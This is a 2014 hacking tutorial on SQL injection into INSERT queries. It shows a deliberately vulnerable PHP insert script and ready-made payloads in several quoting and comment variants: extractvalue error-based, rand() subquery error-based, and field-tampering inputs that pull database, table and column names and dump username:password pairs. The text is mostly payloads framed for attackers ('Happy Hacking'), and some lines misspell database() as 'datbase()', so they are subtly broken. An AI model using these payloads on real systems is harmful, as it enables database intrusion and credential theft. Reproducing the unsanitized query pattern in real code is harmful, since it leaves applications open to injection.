After a long journey with SQL injection i guess if we dont try Insert query injection then the whole journey will be incomplete. So here we will discuss on how a hacker can Abuse new record insertion process using Insert Query Injection.

a simple Example of Insert Query.

insert into table_name (column1,column2,column3) values (value1,value2,value3)


We can inject into Insert Query using the following Injections
1. Xpath Injection
2. Sub Query Injection
3. Tempering the Insert Query input values to get the Output.

I strongly Suggest you to read XPATH Injection and Sub-Query Injection, as over here i wont be discussing in detail Of first two injections. Here we will discuss only some minor change in the injection and other things will remain same.

Let us take a vulnerable Updation script, and start exploring it.

Example:
$title=$_POST['title'];
$post_data = $_POST['posts_data'];
$label =  $_POST['label'];
$query="insert into posts (title,post_data,label) value ('$title','$post_data','$label')";
if (!mysql_query($query,$conn))
echo "Error While Insertion process : " . mysql_error();
else
echo "Inserted Sucessfully
";

Exploitation using XPATH injection.

It will work when the developer have inserted the error function over there. else only 3rd injection will work

Query:
insert into posts (title,post_data,label) value ('$title','$post_data','$label')
Injection in variable Status
' extractvalue(0x0a,concat(0x0a,(select database()))) '
" extractvalue(0x0a,concat(0x0a,(select database()))) "
' extractvalue(0x0a,concat(0x0a,(select database())))--+
" extractvalue(0x0a,concat(0x0a,(select database())))--+
' extractvalue(0x0a,concat(0x0a,(select database())))#
" extractvalue(0x0a,concat(0x0a,(select database())))#
' extractvalue(0x0a,concat(0x0a,(select database())))--
" extractvalue(0x0a,concat(0x0a,(select database())))--

Now lets see what will the query passed. For the above given Query first injection will work.
$title = ' extractvalue(0x0a,concat(0x0a,(select database()))) '
Injection:
insert into posts (title,post_data,label) value (' extractvalue(0x0a,concat(0x0a,(select database()))) ','$post_data','$label')

So actually the above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

Exploitation using Sub-Query Injection.

Query:
insert into posts (title,post_data,label) value ('$title','$post_data','$label')
Injection in variable Status
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) "
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--

Now lets see what will the query passed when title is injected. For the above given Query first injection will work.
$title = ' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '
Injection:
insert into posts (title,post_data,label) value ('' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '','$post_data','$label')

So actually the above query will output the data in form of error. for rest of Exploitation using Sub Query Injectoin. But it will only work when the developer is printing any error. So now lets start with our 3rd method.

Tempering the Insert Query input

Well this time we are not going to create any error assuming that the developer is not giving any error. So we will get the output by inserting the injection and then insert it. After that we will check the Inserted value to get the data.

Unlike Update Query Injection in insert query we are not usually bound to use the same variable space, as here we have multiple injectable parameters in a insert query.

So lets start the exploitation

Query:
insert into posts (title,post_data,label) value ('$title','$post_data','$label')

Our Input is going to $title, $post_data, $label variable. This time we will inject and comment out rest of the query.

so our input in these variables goes this way:
$title = it starts here
$post_data = any data',database())--
$label = 

So as per our input we have left the label field empty as we dont require it anymore. what we did is we added one more parameter in $post_data variable, which when injected in the SQL Query will be used for $label and the rest of the query will be skipped. Lets see how the Query will look like.

Query:
insert into posts (title,post_data,label) value ('it starts here','any data',database())--','')

So if the Label is viewable you will see the database() string over there, and now you can start exploiting with the Following Queries.

Setting up post data to get the Tables:
$post_data = any data',(select group_concat(table_name) from information_schema.tables where table_schema=datbase()))--

Setting up post data to get the columns:
$post_data = any data',(select group_concat(column_name) from information_schema.columns where table_schema=datbase() and table_name='any__table_name_here'))--

Setting up post data to get the columns data:
$post_data = any data',(select group_concat(username,0x3a,password) from any_table_name_here))--

You can also use Limit if required, if you dont know how to use Limit go and read Death Row Injection.

Happy Hacking.

Author : Zenodermus Javanicus
Date : 2014-04-06